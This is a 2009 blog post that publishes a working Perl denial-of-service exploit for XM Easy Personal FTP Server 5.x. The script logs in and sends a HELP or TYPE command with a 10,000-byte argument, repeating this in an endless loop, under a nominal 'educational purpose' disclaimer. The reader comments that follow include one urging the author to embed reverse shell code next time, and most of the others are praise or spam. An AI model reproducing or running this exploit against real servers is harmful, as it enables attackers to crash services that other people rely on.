XM Easy Personal FTP Server HELP and TYPE command Remote Denial of Service exploit
by Vinod Sharma on Jun.09, 2009, under MyHacks
#!usr/bin/perl -w
####################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a “HELP” or “TYPE” command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
#http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl
#
# Product link: http://www.dxm2008.com/
# Vunerbility discovered by: NeerajT of Nevis Labs
#http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th june, 2009
#
#
###Thanks to all the Security Folks###
###################################################################
use IO::Socket;
my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command .” ” .”\x41″ x 10000 .”\r\n”;
if(($#ARGV + 1)!=5)
{
print “\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n”;
print “\nargument command can have a value HELP or TYPE\n”;
print “\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP”;
exit;
}
$socket = new IO::Socket::INET (PeerAddr =>$server_ip, PeerPort => $server_port, Proto => ‘tcp’, ) or die “Couldn’t connect to Server\n”;
while (1)
{
$socket->recv($recv_data,1024);
print “RECIEVED: $recv_data”;
$send_data1 =”USER “.$username.”\r\n”;
$socket->send($send_data1);
$socket->recv($recv_data1,1024);
print “RECIEVED: $recv_data1″;
$send_data2 =”PASS “.$password.”\r\n”;
$socket->send($send_data2);
$socket->recv($recv_data2,1024);
print “RECIEVED: $recv_data2″;
$socket->send($buffer);
print “\nAttack is send…………………\n”;
$socket->recv($recv_data3,1024);
print “RECIEVED: $recv_data3″;
close $socket;
}
June 10th, 2009 on 3:56 pm
New exploit code published ..Good
Next time make it large..embedding Reverse shell code
Regards,
Vikrant
June 10th, 2009 on 8:40 pm
Thanks for posting, I’ll definitely be subscribing to your blog.
June 11th, 2009 on 9:35 am
BTW.. A exploit for this vulnerability was already published on http://downloads.securityfocus.com/vulnerabilities/exploits/35239.py
Next time, it would be nice if you give credit to the original author who discovered the vulnerability !
Cheers,
DaH4cker
http://hypersecurity.blogspot.com
June 11th, 2009 on 5:58 pm
First of all I was not able to find a single exploit for this vulnerability that’s why i wrote an exploit. Second there was no reference mentioned about your exploit code in secunia advisory from where i came to know about this vuln.
To give credit to the original author(you), i have edited my post.
Thanks for your comment.
June 12th, 2009 on 4:50 am
Another one on the go.
Keep the good work going
June 12th, 2009 on 7:49 pm
Hey, nice post, very well written. You should post more about this. I’ll certainly be subscribing.
June 12th, 2009 on 10:58 pm
The article is usefull for me. I’ll be coming back to your blog.
June 15th, 2009 on 3:46 am
The article is usefull for me. I’ll be coming back to your blog.
June 17th, 2009 on 10:15 pm
Hey, nice post, very well written. You should post more about this.
February 3rd, 2010 on 2:20 am
I found your web site when I was searching for something unrelated, but this page was one of the first sites listed in Yahoo, your website must be insanely popular! Keep up the awesome job!
September 3rd, 2010 on 1:50 am
Well, I agree with what you wrote, but not with all of it. Regardless, it is all very good material. Thanks!